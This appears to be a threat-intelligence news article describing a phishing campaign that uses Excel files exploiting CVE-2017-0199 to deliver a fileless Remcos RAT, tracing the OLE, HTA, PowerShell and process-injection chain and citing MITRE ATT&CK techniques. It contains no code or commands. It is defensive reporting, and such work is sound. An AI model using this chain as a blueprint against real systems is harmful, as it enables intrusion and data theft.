In a recent development, an advanced malware campaign has surfaced, utilizing a phishing attack to distribute a seemingly harmless Excel file that exploits the CVE-2017-0199 vulnerability. This campaign is orchestrated by cybercriminals who leverage this vulnerability in Microsoft Office to embed malicious code using OLE objects.
The attackers have employed sophisticated encryption and obfuscation techniques to conceal the malicious payload within the file. Once the victim opens the file, their system unwittingly executes a fileless variant of the Remcos Remote Access Trojan (RAT), granting the attackers remote access and control over the compromised system.
This particular malware campaign exploits the CVE-2017-0199 vulnerability to deliver the Remcos RAT through a phishing email containing an encrypted Excel file. The attack chain involves the exploitation of OLE objects, execution of HTA applications, and utilization of PowerShell commands to inject the RAT into a legitimate process. This technique has been previously exploited by various malware families, including LATENTBOT, FINSPY, and WingBird/FinFisher.
Recent campaigns in 2024 have been observed deploying a variety of malware tools such as RevengeRAT, SnakeKeylogger, GuLoader, AgentTesla, and FormBook to target sectors like Government, Manufacturing, Technology/IT, and Banking primarily in Belgium, Japan, the United States, South Korea, Canada, Germany, and Australia. These campaigns leverage spearphishing tactics to entice victims into opening deceptive Excel documents, exploiting the CVE-2017-0199 vulnerability to execute embedded OLE objects containing malicious URLs, ultimately compromising the victim’s system.
The Excel file utilizes the CVE-2017-0199 vulnerability to deliver a malicious HTA application, which triggers the execution of a PowerShell script downloading and running a VBScript from a remote URL. This initiates a chain of PowerShell processes that escalate the attack, ultimately downloading a JPEG file containing a base64-encoded ‘dnlib.dll’ library for further malicious activities.
The attack commences with PowerShell downloading a base64-encoded text file from a malicious URL, which is processed by ‘dnlib.dll’ to create a .NET assembly of Remcos RAT. The RAT is then injected into the legitimate process ‘RegAsm’, establishing persistence by injecting itself into other legitimate processes to evade traditional security defenses.
Indicators of the presence of Remcos RAT include its keylogger file and associated Indicators of Compromise (IOCs) using techniques such as T1055.001, T1027, T1543.003, and T1071.001 identified by MITRE ATT&CK.
In summary, the attackers behind this malware campaign have employed a combination of advanced techniques to create a persistent threat by exploiting the CVE-2017-0199 vulnerability in Microsoft Office. They have utilized a series of tools and scripts to maintain persistence on the infected system and potentially exfiltrate sensitive data. Organizations and individuals are advised to stay vigilant and deploy robust cybersecurity measures to defend against such sophisticated cyber threats.